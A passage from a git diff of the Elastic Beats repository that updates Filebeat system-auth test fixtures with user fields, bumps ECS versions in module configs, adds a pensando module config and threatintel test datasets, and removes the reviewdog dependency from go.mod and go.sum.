@@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -911,7 +959,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -973,7 +1025,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1114,7 +1170,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1244,7 +1304,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1306,7 +1370,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1368,7 +1436,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1430,7 +1502,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1492,7 +1568,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1622,7 +1702,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1684,7 +1768,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1746,7 +1834,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1808,7 +1900,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1870,7 +1966,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2000,7 +2100,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2062,7 +2166,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2124,7 +2232,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2237,7 +2349,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2299,7 +2415,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2361,7 +2481,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2423,7 +2547,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2485,7 +2613,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2615,7 +2747,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2677,6 +2813,10 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" } ] \ No newline at end of file diff --git a/filebeat/module/system/auth/test/test.log-expected.json b/filebeat/module/system/auth/test/test.log-expected.json index dc677ebb58c7..25f2b8608b5b 100644 --- a/filebeat/module/system/auth/test/test.log-expected.json +++ b/filebeat/module/system/auth/test/test.log-expected.json @@ -2,7 +2,8 @@ { "event.action": "ssh_login", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "system.auth", "event.kind": "event", @@ -39,7 +40,8 @@ { "event.action": "ssh_login", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "system.auth", "event.kind": "event", @@ -165,13 +167,15 @@ "localhost" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/ls", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -219,13 +223,15 @@ "localhost" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/cat /var/log/secure", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/1", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -242,7 +248,8 @@ "precise32" ], "related.user": [ - "tsg" + "tsg", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/ls", @@ -250,6 +257,7 @@ "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/1", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "tsg" }, { diff --git a/filebeat/module/system/auth/test/timestamp.log-expected.json b/filebeat/module/system/auth/test/timestamp.log-expected.json index 4d428b4d1cce..ccbaedf20398 100644 --- a/filebeat/module/system/auth/test/timestamp.log-expected.json +++ b/filebeat/module/system/auth/test/timestamp.log-expected.json @@ -15,7 +15,14 @@ "related.hosts": [ "localhost" ], - "service.type": "system" + "related.user": [ + "userauth3", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "0", + "user.name": "userauth3" }, { "@timestamp": "2019-06-14T09:31:15.412-02:00", diff --git a/filebeat/module/system/syslog/config/syslog.yml b/filebeat/module/system/syslog/config/syslog.yml index d1d5c5935061..429067177d11 100644 --- a/filebeat/module/system/syslog/config/syslog.yml +++ b/filebeat/module/system/syslog/config/syslog.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/traefik/access/config/traefik-access.yml b/filebeat/module/traefik/access/config/traefik-access.yml index 6fcf0ab7a1f6..2db4213af7b4 100644 --- a/filebeat/module/traefik/access/config/traefik-access.yml +++ b/filebeat/module/traefik/access/config/traefik-access.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/modules.d/pensando.yml.disabled b/filebeat/modules.d/pensando.yml.disabled new file mode 100644 index 000000000000..72350a5dcb69 --- /dev/null +++ b/filebeat/modules.d/pensando.yml.disabled @@ -0,0 +1,13 @@ +# Module: pensando +# Docs: https://www.elastic.co/guide/en/beats/filebeat/master/filebeat-module-pensando.html + +- module: pensando +# Firewall logs + dfw: + enabled: true + var.syslog_host: 0.0.0.0 + var.syslog_port: 9001 + + # Set custom paths for the log files. If left empty, + # Filebeat will choose the paths depending on your OS. + # var.paths: diff --git a/filebeat/tests/system/test_modules.py b/filebeat/tests/system/test_modules.py index 2aa5d9198ab5..dc5d42c64726 100644 --- a/filebeat/tests/system/test_modules.py +++ b/filebeat/tests/system/test_modules.py @@ -270,7 +270,11 @@ def clean_keys(obj): "gsuite.saml", "gsuite.user_accounts", "zoom.webhook", - "snyk.vulnerabilities", + "threatintel.otx", + "threatintel.abuseurl", + "threatintel.abusemalware", + "threatintel.anomali", + "snyk.vulnerabilities" } # dataset + log file pairs for which @timestamp is kept as an exception from above remove_timestamp_exception = { diff --git a/filebeat/tests/system/test_syslog.py b/filebeat/tests/system/test_syslog.py index a535bdf970f9..be4a600f7143 100644 --- a/filebeat/tests/system/test_syslog.py +++ b/filebeat/tests/system/test_syslog.py @@ -254,7 +254,7 @@ def assert_syslog(self, syslog, has_address=True): assert syslog["event.severity"] == 5 assert syslog["hostname"] == "wopr.mymachine.co" assert syslog["input.type"] == "syslog" - assert syslog["message"] == "'su root' failed for lonvick on /dev/pts/8 0" + assert syslog["message"].startswith("'su root' failed for lonvick on /dev/pts/8") assert syslog["process.pid"] == 2000 assert syslog["process.program"] == "postfix/smtpd" assert syslog["syslog.facility"] == 1 diff --git a/generator/_templates/beat/{beat}/tools/tools.go b/generator/_templates/beat/{beat}/tools/tools.go index edd121e211b9..289a0a2cb705 100644 --- a/generator/_templates/beat/{beat}/tools/tools.go +++ b/generator/_templates/beat/{beat}/tools/tools.go @@ -10,6 +10,5 @@ import ( _ "golang.org/x/tools/cmd/goimports" _ "github.com/mitchellh/gox" - _ "github.com/reviewdog/reviewdog/cmd/reviewdog" _ "golang.org/x/lint/golint" ) diff --git a/generator/_templates/metricbeat/{beat}/tools/tools.go b/generator/_templates/metricbeat/{beat}/tools/tools.go index edd121e211b9..289a0a2cb705 100644 --- a/generator/_templates/metricbeat/{beat}/tools/tools.go +++ b/generator/_templates/metricbeat/{beat}/tools/tools.go @@ -10,6 +10,5 @@ import ( _ "golang.org/x/tools/cmd/goimports" _ "github.com/mitchellh/gox" - _ "github.com/reviewdog/reviewdog/cmd/reviewdog" _ "golang.org/x/lint/golint" ) diff --git a/go.mod b/go.mod index 3c2c0fce6ac6..f5407a2e3756 100644 --- a/go.mod +++ b/go.mod @@ -59,17 +59,17 @@ require ( github.com/dustin/go-humanize v1.0.0 github.com/eapache/go-resiliency v1.2.0 github.com/eclipse/paho.mqtt.golang v1.2.1-0.20200121105743-0d940dd29fd2 - github.com/elastic/ecs v1.6.0 + github.com/elastic/ecs v1.0.0-beta2.0.20210202203518-638aa2bb5271 github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a - github.com/elastic/go-concert v0.0.4 - github.com/elastic/go-libaudit/v2 v2.1.0 + github.com/elastic/go-concert v0.1.0 + github.com/elastic/go-libaudit/v2 v2.2.0 github.com/elastic/go-licenser v0.3.1 github.com/elastic/go-lookslike v0.3.0 github.com/elastic/go-lumber v0.1.0 github.com/elastic/go-perf v0.0.0-20191212140718-9c656876f595 github.com/elastic/go-seccomp-bpf v1.1.0 github.com/elastic/go-structform v0.0.7 - github.com/elastic/go-sysinfo v1.3.0 + github.com/elastic/go-sysinfo v1.5.0 github.com/elastic/go-txfile v0.0.7 github.com/elastic/go-ucfg v0.8.3 github.com/elastic/go-windows v1.0.1 // indirect @@ -137,7 +137,6 @@ require ( github.com/prometheus/procfs v0.0.11 github.com/prometheus/prometheus v2.5.0+incompatible github.com/rcrowley/go-metrics v0.0.0-20200313005456-10cdbea86bc0 - github.com/reviewdog/reviewdog v0.9.17 github.com/samuel/go-parser v0.0.0-20130731160455-ca8abbf65d0e // indirect github.com/samuel/go-thrift v0.0.0-20140522043831-2187045faa54 github.com/sanathkr/yaml v1.0.1-0.20170819201035-0056894fa522 // indirect diff --git a/go.sum b/go.sum index d23ec2ecaf68..b7b9053d30b2 100644 --- a/go.sum +++ b/go.sum @@ -139,8 +139,6 @@ github.com/blakerouse/service v1.1.1-0.20200924160513-057808572ffa/go.mod h1:RrJ github.com/blakesmith/ar v0.0.0-20150311145944-8bd4349a67f2 h1:oMCHnXa6CCCafdPDbMh/lWRhRByN0VFLvv+g+ayx1SI= github.com/blakesmith/ar v0.0.0-20150311145944-8bd4349a67f2/go.mod h1:PkYb9DJNAwrSvRx5DYA+gUcOIgTGVMNkfSCbZM8cWpI= github.com/blang/semver v3.1.0+incompatible/go.mod h1:kRBLl5iJ+tD4TcOOxsy/0fnwebNt5EWlYSAyrTnjyyk= -github.com/bradleyfalzon/ghinstallation v1.1.0 h1:mwazVinJU0mPyLxIcdtJzu4DhWXFO5lMsWhKyFRIwFk= -github.com/bradleyfalzon/ghinstallation v1.1.0/go.mod h1:p7iD8KytOOKg2wCqbwvJlq4JGpYMjwjkiqdyUqOIHLI= github.com/bsm/sarama-cluster v2.1.14-0.20180625083203-7e67d87a6b3f+incompatible h1:4g18+HnTDwEtO0n7K8B1Kjq+04MEKJRkhJNQ/hb9d5A= github.com/bsm/sarama-cluster v2.1.14-0.20180625083203-7e67d87a6b3f+incompatible/go.mod h1:r7ao+4tTNXvWm+VRpRJchr2kQhqxgmAp2iEX5W96gMM= github.com/cavaliercoder/badio v0.0.0-20160213150051-ce5280129e9e h1:YYUjy5BRwO5zPtfk+aa2gw255FIIoi93zMmuy19o0bc= @@ -249,16 +247,16 @@ github.com/eclipse/paho.mqtt.golang v1.2.1-0.20200121105743-0d940dd29fd2 h1:DW6W github.com/eclipse/paho.mqtt.golang v1.2.1-0.20200121105743-0d940dd29fd2/go.mod h1:H9keYFcgq3Qr5OUJm/JZI/i6U7joQ8SYLhZwfeOo6Ts= github.com/elastic/dhcp v0.0.0-20200227161230-57ec251c7eb3 h1:lnDkqiRFKm0rxdljqrj3lotWinO9+jFmeDXIC4gvIQs= github.com/elastic/dhcp v0.0.0-20200227161230-57ec251c7eb3/go.mod h1:aPqzac6AYkipvp4hufTyMj5PDIphF3+At8zr7r51xjY= -github.com/elastic/ecs v1.6.0 h1:8NmgfnsjmKXh9hVsK3H2tZtfUptepNc3msJOAynhtmc= -github.com/elastic/ecs v1.6.0/go.mod h1:pgiLbQsijLOJvFR8OTILLu0Ni/R/foUNg0L+T6mU9b4= +github.com/elastic/ecs v1.0.0-beta2.0.20210202203518-638aa2bb5271 h1:lEqA6OOU2w/7cce5M2v6ZAaOqsTw2Q3ZFqSgbH0bMyQ= +github.com/elastic/ecs v1.0.0-beta2.0.20210202203518-638aa2bb5271/go.mod h1:pgiLbQsijLOJvFR8OTILLu0Ni/R/foUNg0L+T6mU9b4= github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a h1:2NHgf1RUw+f240lpTnLrCp1aBNvq2wDi0E1A423/S1k= github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a/go.mod h1:uh/Gj9a0XEbYoM4NYz4LvaBVARz3QXLmlNjsrKY9fTc= github.com/elastic/fsevents v0.0.0-20181029231046-e1d381a4d270 h1:cWPqxlPtir4RoQVCpGSRXmLqjEHpJKbR60rxh1nQZY4= github.com/elastic/fsevents v0.0.0-20181029231046-e1d381a4d270/go.mod h1:Msl1pdboCbArMF/nSCDUXgQuWTeoMmE/z8607X+k7ng= -github.com/elastic/go-concert v0.0.4 h1:pzgYCmJ/xMJsW8PSk33inAWZ065hrwSeP79TpwAbsLE= -github.com/elastic/go-concert v0.0.4/go.mod h1:9MtFarjXroUgmm0m6HY3NSe1XiKhdktiNRRj9hWvIaM= -github.com/elastic/go-libaudit/v2 v2.1.0 h1:yWSKoGaoWLGFPjqWrQ4gwtuM77pTk7K4CsPxXss8he4= -github.com/elastic/go-libaudit/v2 v2.1.0/go.mod h1:MM/l/4xV7ilcl+cIblL8Zn448J7RZaDwgNLE4gNKYPg= +github.com/elastic/go-concert v0.1.0 h1:gz/yvA3bseuHzoF/lNMltkL30XdPqMo+bg5o2mBx2EE= +github.com/elastic/go-concert v0.1.0/go.mod h1:9MtFarjXroUgmm0m6HY3NSe1XiKhdktiNRRj9hWvIaM= +github.com/elastic/go-libaudit/v2 v2.2.0 h1:TY3FDpG4Zr9Qnv6KYW6olYr/U+nfu0rD2QAbv75VxMQ= +github.com/elastic/go-libaudit/v2 v2.2.0/go.mod h1:MM/l/4xV7ilcl+cIblL8Zn448J7RZaDwgNLE4gNKYPg= github.com/elastic/go-licenser v0.3.1 h1:RmRukU/JUmts+rpexAw0Fvt2ly7VVu6mw8z4HrEzObU= github.com/elastic/go-licenser v0.3.1/go.mod h1:D8eNQk70FOCVBl3smCGQt/lv7meBeQno2eI1S5apiHQ= github.com/elastic/go-lookslike v0.3.0 h1:HDI/DQ65V85ZqM7D/sbxcK2wFFnh3+7iFvBk2v2FTHs= @@ -274,8 +272,8 @@ github.com/elastic/go-seccomp-bpf v1.1.0/go.mod h1:l+89Vy5BzjVcaX8USZRMOwmwwDScE github.com/elastic/go-structform v0.0.7 h1:ihszOJQryNuIIHE2ZgsbiDq+agKO6V4yK0JYAI3tjzc= github.com/elastic/go-structform v0.0.7/go.mod h1:QrMyP3oM9Sjk92EVGLgRaL2lKt0Qx7ZNDRWDxB6khVs= github.com/elastic/go-sysinfo v1.1.1/go.mod h1:i1ZYdU10oLNfRzq4vq62BEwD2fH8KaWh6eh0ikPT9F0= -github.com/elastic/go-sysinfo v1.3.0 h1:eb2XFGTMlSwG/yyU9Y8jVAYLIzU2sFzWXwo2gmetyrE= -github.com/elastic/go-sysinfo v1.3.0/go.mod h1:i1ZYdU10oLNfRzq4vq62BEwD2fH8KaWh6eh0ikPT9F0= +github.com/elastic/go-sysinfo v1.5.0 h1:6DBn+WmxLz+IJ9MY+MzX2rWQNd04vSRB3TSuXu/2JjU= +github.com/elastic/go-sysinfo v1.5.0/go.mod h1:i1ZYdU10oLNfRzq4vq62BEwD2fH8KaWh6eh0ikPT9F0= github.com/elastic/go-txfile v0.0.7 h1:Yn28gclW7X0Qy09nSMSsx0uOAvAGMsp6XHydbiLVe2s= github.com/elastic/go-txfile v0.0.7/go.mod h1:H0nCoFae0a4ga57apgxFsgmRjevNCsEaT6g56JoeKAE= github.com/elastic/go-ucfg v0.7.0/go.mod h1:iaiY0NBIYeasNgycLyTvhJftQlQEUO2hpF+FX0JKxzo= @@ -387,12 +385,6 @@ github.com/google/go-cmp v0.4.0 h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4= github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.2 h1:X2ev0eStA3AbceY54o37/0PQ/UWqKEiiO2dKL5OPaFM= github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= -github.com/google/go-github/v28 v28.1.1 h1:kORf5ekX5qwXO2mGzXXOjMe/g6ap8ahVe0sBEulhSxo= -github.com/google/go-github/v28 v28.1.1/go.mod h1:bsqJWQX05omyWVmc00nEUql9mhQyv38lDZ8kPZcQVoM= -github.com/google/go-github/v29 v29.0.2 h1:opYN6Wc7DOz7Ku3Oh4l7prmkOMwEcQxpFtxdU8N8Pts= -github.com/google/go-github/v29 v29.0.2/go.mod h1:CHKiKKPHJ0REzfwc14QMklvtHwCveD0PxlMjLlzAM5E= -github.com/google/go-querystring v1.0.0 h1:Xkwi/a1rcvNg1PPYe5vI8GbeBY/jrVuDX5ASuANWTrk= -github.com/google/go-querystring v1.0.0/go.mod h1:odCYkC5MyYFN7vkCjXpyrEuKhc/BUO6wN/zVPAxq5ck= github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= github.com/google/gofuzz v1.1.0 h1:Hsa8mG0dQ46ij8Sl2AYJDUv1oA9/d6Vk+3LG99Oe02g= github.com/google/gofuzz v1.1.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= @@ -406,7 +398,6 @@ github.com/google/pprof v0.0.0-20191218002539-d4f498aebedc/go.mod h1:ZgVRPoUq/hf github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 h1:El6M4kTTCOh6aBiKaUGG7oYTSPP8MxqL4YI3kZKwcP4= github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510/go.mod h1:pupxD2MaaD3pAXIBCelhxNneeOaAeabZDe5s4K6zSpQ= -github.com/google/subcommands v1.0.1/go.mod h1:ZjhPrFU+Olkh9WazFPsl27BQ4UPiG37m3yTrtFlrHVk= github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.1.2-0.20190416172445-c2e93f3ae59f h1:XXzyYlFbxK3kWfcmu3Wc+Tv8/QQl/VqwsWuSYF1Rj0s= github.com/google/uuid v1.1.2-0.20190416172445-c2e93f3ae59f/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= @@ -455,10 +446,6 @@ github.com/hashicorp/golang-lru v0.5.2-0.20190520140433-59383c442f7d/go.mod h1:/ github.com/hashicorp/hcl v1.0.0/go.mod h1:E5yfLk+7swimpb2L/Alb/PJmXilQ/rhwaUYs4T20WEQ= github.com/hashicorp/nomad/api v0.0.0-20201203164818-6318a8ac7bf8 h1:Yrz9yGVJf5Ce2KS7x8hS/MUTIeBmGEhF8nhzolRpSqY= github.com/hashicorp/nomad/api v0.0.0-20201203164818-6318a8ac7bf8/go.mod h1:vYHP9jMXk4/T2qNUbWlQ1OHCA1hHLil3nvqSmz8mtgc= -github.com/haya14busa/go-actions-toolkit v0.0.0-20200105081403-ca0307860f01 h1:HiJF8Mek+I7PY0Bm+SuhkwaAZSZP83sw6rrTMrgZ0io= -github.com/haya14busa/go-actions-toolkit v0.0.0-20200105081403-ca0307860f01/go.mod h1:1DWDZmeYf0LX30zscWb7K9rUMeirNeBMd5Dum+seUhc= -github.com/haya14busa/go-checkstyle v0.0.0-20170303121022-5e9d09f51fa1/go.mod h1:RsN5RGgVYeXpcXNtWyztD5VIe7VNSEqpJvF2iEH7QvI= -github.com/haya14busa/secretbox v0.0.0-20180525171038-07c7ecf409f5/go.mod h1:FGO/dXIFZnan7KvvUSFk1hYMnoVNzB6NTMPrmke8SSI= github.com/hectane/go-acl v0.0.0-20190604041725-da78bae5fc95 h1:S4qyfL2sEm5Budr4KVMyEniCy+PbS55651I/a+Kn/NQ= github.com/hectane/go-acl v0.0.0-20190604041725-da78bae5fc95/go.mod h1:QiyDdbZLaJ/mZP4Zwc9g2QsfaEA4o7XvvgZegSci5/E= github.com/hpcloud/tail v1.0.0 h1:nfCOvKYfkgYP8hkirhJocXT2+zOD8yUNjXaWfTlyFKI= @@ -500,7 +487,6 @@ github.com/jstemmer/go-junit-report v0.9.1/go.mod h1:Brl9GWCQeLvo8nXZwPNNblvFj/X github.com/jtolds/gls v4.20.0+incompatible h1:xdiiI2gbIgH/gLH7ADydsJ1uDOEzR8yvV7C0MuV77Wo= github.com/jtolds/gls v4.20.0+incompatible/go.mod h1:QJZ7F/aHp+rZTRtaJ1ow/lLfFfVYBRgL+9YlvaHOwJU= github.com/julienschmidt/httprouter v1.2.0/go.mod h1:SYymIcj16QtmaHHD7aYtjjsJG7VTCxuUUipMqKk8s4w= -github.com/justinas/nosurf v1.1.0/go.mod h1:ALpWdSbuNGy2lZWtyXdjkYv4edL23oSEgfBT1gPJ5BQ= github.com/karrick/godirwalk v1.15.6 h1:Yf2mmR8TJy+8Fa0SuQVto5SYap6IF7lNVX4Jdl8G1qA= github.com/karrick/godirwalk v1.15.6/go.mod h1:j4mkqPuvaLI8mp1DroR3P6ad7cyYd4c1qeJ3RV7ULlk= github.com/kisielk/errcheck v1.1.0/go.mod h1:EZBBE59ingxPouuu3KfxchcWSUPOHkagtvWXihfKN4Q= @@ -523,8 +509,6 @@ github.com/kr/text v0.1.0 h1:45sCR5RtlFHMR4UwH9sdQ5TC8v0qDQCHnXt+kaKSTVE= github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY= github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE= -github.com/kylelemons/godebug v1.1.0 h1:RPNrshWIDI6G2gRW9EHilWtl7Z6Sb1BR0xunSBf0SNc= -github.com/kylelemons/godebug v1.1.0/go.mod h1:9/0rRGxNHcop5bhtWyNeEfOS8JIWk580+fNqagV/RAw= github.com/lib/pq v1.0.0/go.mod h1:5WUZQaWbwv1U+lTReE5YruASi9Al49XbQIvNi/34Woo= github.com/lib/pq v1.1.2-0.20190507191818-2ff3cb3adc01 h1:EPw7R3OAyxHBCyl0oqh3lUZqS5lu3KSxzzGasE0opXQ= github.com/lib/pq v1.1.2-0.20190507191818-2ff3cb3adc01/go.mod h1:5WUZQaWbwv1U+lTReE5YruASi9Al49XbQIvNi/34Woo= @@ -549,8 +533,6 @@ github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hd github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE= github.com/mattn/go-isatty v0.0.12 h1:wuysRhFDzyxgEmMf5xjvJ2M9dZoWAXNNr5LSBS7uHXY= github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= -github.com/mattn/go-shellwords v1.0.7 h1:KqhVjVZomx2puPACkj9vrGFqnp42Htvo9SEAWePHKOs= -github.com/mattn/go-shellwords v1.0.7/go.mod h1:3xCvwCdWdlDJUrvuMn7Wuy9eWs4pE8vqg+NOMyg4B2o= github.com/mattn/go-sqlite3 v1.9.0 h1:pDRiWfl+++eC2FEFRy6jXmQlvp4Yh3z1MJKg4UeYM/4= github.com/mattn/go-sqlite3 v1.9.0/go.mod h1:FPy6KqzDD04eiIsT53CuJW3U88zkxoIYsOqkbpncsNc= github.com/matttproud/golang_protobuf_extensions v1.0.1/go.mod h1:D8He9yQNgCq6Z5Ld7szi9bcBfOoFv/3dc6xSMkL2PC0= @@ -659,13 +641,8 @@ github.com/prometheus/procfs v0.0.11 h1:DhHlBtkHWPYi8O2y31JkK0TF+DGM+51OopZjH/Ia github.com/prometheus/procfs v0.0.11/go.mod h1:lV6e/gmhEcM9IjHGsFOCxxuZ+z1YqCvr4OA4YeYWdaU= github.com/prometheus/prometheus v2.5.0+incompatible h1:7QPitgO2kOFG8ecuRn9O/4L9+10He72rVRJvMXrE9Hg= github.com/prometheus/prometheus v2.5.0+incompatible/go.mod h1:oAIUtOny2rjMX0OWN5vPR5/q/twIROJvdqnQKDdil/s= -github.com/rakyll/statik v0.1.6/go.mod h1:OEi9wJV/fMUAGx1eNjq75DKDsJVuEv1U0oYdX6GX8Zs= github.com/rcrowley/go-metrics v0.0.0-20200313005456-10cdbea86bc0 h1:MkV+77GLUNo5oJ0jf870itWm3D0Sjh7+Za9gazKc5LQ= github.com/rcrowley/go-metrics v0.0.0-20200313005456-10cdbea86bc0/go.mod h1:bCqnVzQkZxMG4s8nGwiZ5l3QUCyqpo9Y+/ZMZ9VjZe4= -github.com/reviewdog/errorformat v0.0.0-20200109134752-8983be9bc7dd h1:fvaEkjpr2NJbtnFRCft7D6y/mQ5/2OQU0pKJLW8dwFA= 